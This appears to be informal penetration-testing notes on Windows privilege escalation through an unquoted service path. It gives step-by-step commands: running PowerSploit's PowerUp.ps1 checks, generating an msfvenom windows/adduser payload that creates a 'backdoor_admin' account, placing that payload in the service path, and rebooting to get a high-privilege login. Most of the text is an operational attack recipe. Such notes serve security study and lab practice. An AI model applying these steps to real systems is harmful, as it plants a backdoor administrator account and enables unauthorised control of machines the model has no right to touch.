Unquoted Service Path

// click on start Button --> serach for services --> open the application.

// here all the running services are listed --> find your vulnerable service.

// Double Click The Service and Examine the Path :



C:\some path\some path2\vulnservice.exe
here note the space btw the folders --> "some   path" this is a single folder but the bloody space made it vulnerable 
 now we can use it in unintended way.
 
 but if any part of the path is writable by us....
 
 to identify :
 use https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
 or do it mannually.
 
 
 
 Now to run this transfer this to windows and open powershell ;
 >>> Invoke-Module .\PowerUp.ps1
 >>> Invoke-AllChecks # but if we want only want to check for unquoted path run -->  Get-UnquotedService
 
 Now notice the unquoted service path.
 
 
 
 Go To Kali :
 >>> msfvenom -p windows/adduser USER=backdoor_admin PASS=helloguys! -f exe  > service.exe
 
 now transfer this payload to windows and place it as we disscussed above .
 E.G. C:\Program Files\  --> C:\Program.exe Files\
 Note : Don't forget to rename your payload as per your path.
 
 
 now go to services (from start button ) and restart the service again ....don't worry if you don't have permission to do it ....so go and reboot the machine so it will be executed automatically
 
 after restarting / rebooting :
  open cmd :
  >>> net user 
  <you will have your user created>
  
  
 
   so just logout and login again with new user(high privs)
   note : while login may be you need to specify your username : Win10-1\<username>